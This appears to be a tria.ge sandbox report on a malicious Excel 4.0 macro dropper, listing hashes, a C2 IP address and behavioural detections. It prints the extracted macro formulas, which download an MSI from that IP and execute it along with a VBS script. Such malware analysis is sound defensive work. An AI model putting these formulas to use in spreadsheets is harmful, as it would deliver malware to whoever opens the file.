Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    0fe2799c2a3c64d7f4a4ed2ba8992538

  • Size

    6KB

  • Sample

    231230-f2f5ssfec7

  • MD5

    0fe2799c2a3c64d7f4a4ed2ba8992538

  • SHA1

    cf85dcfafc3b70fe8278d94fca3a6e787b60cd86

  • SHA256

    92ff0261aa5ba46511c1bdc9e40b348e7296efcbc8124b21db4f7e7ad69dd97e

  • SHA512

    1d528d9cae734594d6e834afc80393dec7c4779d49fda076893bd693ec5c53eb65a929be09d460c3a6e92f6826797a248d185674328069174e8c4e499160f7ef

  • SSDEEP

    192:NDSTuSj1aEOmmfR48UhHFBFYu2b98y6ufk:NgumwS1FY7b98y6ik

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187

Attributes
  • formulas

    =EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187

Targets

    • Target

      0fe2799c2a3c64d7f4a4ed2ba8992538

    • Size

      6KB

    • MD5

      0fe2799c2a3c64d7f4a4ed2ba8992538

    • SHA1

      cf85dcfafc3b70fe8278d94fca3a6e787b60cd86

    • SHA256

      92ff0261aa5ba46511c1bdc9e40b348e7296efcbc8124b21db4f7e7ad69dd97e

    • SHA512

      1d528d9cae734594d6e834afc80393dec7c4779d49fda076893bd693ec5c53eb65a929be09d460c3a6e92f6826797a248d185674328069174e8c4e499160f7ef

    • SSDEEP

      192:NDSTuSj1aEOmmfR48UhHFBFYu2b98y6ufk:NgumwS1FY7b98y6ik

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks